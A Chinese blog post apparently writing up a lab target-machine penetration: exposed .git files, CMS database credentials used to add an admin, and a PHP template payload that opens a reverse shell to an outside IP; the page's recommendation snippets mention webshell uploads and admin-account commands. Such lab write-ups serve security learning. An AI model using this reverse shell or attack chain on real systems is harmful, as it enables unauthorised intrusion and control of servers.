记一次渗透

于 2024-08-04 23:09:23 发布
阅读量103 收藏 3
点赞数 1
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74232792/article/details/140913871
版权

靶机

主机发现,端口扫描

目录扫描

/.git/config

:8585/frank/devguru-website.git

首页发现好像是个框架

网上搜索漏洞复现都是1.4的版本,这个是1.14.9的版本,且对应功能不全,登不上去

有一个cms

/.git/logs/refs/heads/master

再次尝试登录,密码解不出来

还有一个登录方法,按照例子输入一个网址,似乎有ssrf

尝试其他协议

但是会自动加个http://在最前面

还要一个sql登录地址,登不上去

80/backend

搜教程,下载源码

使用工具脚本下载git源码

Config的database中有mysql的账号密码

登录进去创建用户

再把用户添加到id=1的组中

登录

有个模板一样的东西

直接往里写反弹shell的命令

function onStart(){

//nc监听7777端口

    $s=fsockopen("47.99.195.123",7777);

    $proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);

}

访问主页

成功反弹

.南捱
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次某单位的内网渗透测试
黑战士的博客
06-20 662
网卡信息、补丁信息、杀毒进程、用户在线情况、是否存在域、翻文件查找数据库密码、浏览器保存密码、查看路由等。使用越权加文件上传拿到shell。192.168.xx.x 管理员。通过哥斯拉上线msf。
一次渗透实验题
迷风小白
05-31 3046
添加摘要 0x01 用nmap扫一下发现有一个1433数据库端口和一个8080端口 访问一下8080端口,发现是个登录页面 通过提示要在页面进行信息收集,得到员工姓名:天子,然后用这个姓名登录进行抓包爆破密码 因为只能用虚拟机里的东西,然后选择相应的字典进行爆破。 得到密码:woaini521,登录后台拿到第一个key 要想拿到第二个key...
一次渗透测试实战
qq_45434762的博客
11-17 1357
免责声明 本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与NowSec及分享者无关 0.起因 博主从周一到周五一直在收同一个公司发送的垃圾短信(这从短信链接中的域名可以看出),但是当博主点进网页看的时候,发现这是可以说是一家骗子网站吧。网站所卖的东西...
一次渗透实战
crowsec
01-26 952
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.05.14 01 前提 在早些时候看到先知上有一篇关于thinkphp rce的实战文章 https://xz.aliyun.com/t/6267 于是顺着师傅的思路也来试试 从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了 02geshell之路 通过报错的方式发现了当前的版本为 ThinkPHPV5.0.23 通过师傅的思路,先去找phpinfo界面 http:/...
一次详细的实战渗透
蚁景网安学院
11-03 2200
一次授权的渗透测试,过程比较详细,充满了巧合,也算比较有意思,直接录一下。整体来说难度不大,没有域,难点在免杀,能拿报表系统是巧合,转发上线没意外,似乎内网环境比较大。
一次渗透测试实战
热门推荐
m0_46467017的博客
04-23 2万+
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结 前言 学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。 信息收集 这次的
一次无线渗透
weixin_43639741的博客
06-06 1385
用到的工具 一台root的安卓手机(我这台手机刷了miui9) Csploit 安卓渗透神器 下载地址:https://github.com/cSploit/android/releases Kali meterpreter 当然你有Kali的Nethunter设备更好 开始测试 利用万能钥匙找一波wifi,运气好找到一个 连接wifi 用小米系统自带的WiFi分享功能,生成分享二维码。 然...
一次网络安全渗透测试实战指南
kali_Ma的博客
10-25 4486
基于一次授权的渗透把一些思路整理一下,本次的重点在以洞打洞原则发现一个小洞顺藤摸瓜发现更多的高危甚至严重问题,像我们日常渗透有这样一步步思路进行收获都不小,当然了运气可以省很大部分时间和心思,一步到位的欧皇也是存在。
一次渗透学校网站
qq_54671803的博客
06-01 2058
00x1:掏出我们的狗逼,直接一顿乱扫,别学我,我已经被抓了 (可怕)
一次真实渗透经历
qq_39682037的博客
05-23 3902
背景小编就不多解释了,小编在某站点扫描时,发现其可能存在上传漏洞 小编想上传一句话木马,但是发现该站点对文件后缀进行了过滤,故采用burpsuite抓包实现一句话木马文件上传 成功上传之后,利用一句话木马进行连接 利用菜刀工具的cmd创建用户添加管理员组,打开3389端口允许远程连接。 例: net user test test /add net localgroup administrators test /add REG ADD HKLM\SYSTEM\CurrentControlSet\Con
098-一次渗透之路.pdf
09-20
098-一次渗透之路.pdf
122-一次渗透测试后引发的小扩展.pdf
09-20
在这里,我们讨论了一次渗透测试后引发的小扩展,主要涉及到certutil和wmic命令的使用,以及如何绕过安全软件的拦截。 首先,作者使用了certutil命令来下载文件,但是发现被安全软件拦截。于是,作者尝试了不同的...
一次不完整的渗透1
08-08
一次不完整的渗透测试 本文将详细介绍一次渗透测试的过程,从目标选择到最终的提权过程。该测试的目标是一个理工大学的网站,使用 phpCMS 3.0 版本搭建。 首先,对目标进行了大致的踩点,查看网站的外观和结构。...
一次BIGIP Configuration Utility渗透.pdf
04-22
本文档主要介绍了一次针对F5 BIG-IP设备中的Configuration Utility进行的安全渗透测试过程。测试过程中发现了两个已知的高危漏洞CVE-2020-5902与CVE-2021-22986,并尝试利用这些漏洞进行进一步的攻击活动。 #### 二...
一次tp5.0.241
08-03
TP5.0.24 版本中的 RCE 漏洞是一个严重的安全漏洞,攻击者可以利用该漏洞来控制服务器。为了避免该漏洞的利用,开发者需要对用户输入进行严格的过滤和验证,同时也需要升级到最新版本的 TP 框架。
Python基础学习笔记(一)
执笔写JAVA
08-02 1002
python学习笔记第一阶段,软件安装、基础语法、常用API和面向对象等
Netty4自学笔记 (3) - Netty NIO Server和Client 样例说明
最新发布
CoderCoding的博客
08-03 611
更新节奏缓慢,因为每晚学习注意力不够集中,学习进展缓慢。本还给自己找了一大堆其他理由,但摸着良心问自己,似乎只有这个理由说的通。
物理笔记-八年级上册
m0_69379426的博客
08-01 274
电学,力学,声学,光学,热学。
Netty4自学笔记 (2) - Java NIO
CoderCoding的博客
08-03 957
距离上一篇博文已经过去了半个多月。这期间有一周多的时间用在了准备单位举办的英语竞赛上。余下的时间沉迷于陪孩子玩耍和睡觉,日复一日。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值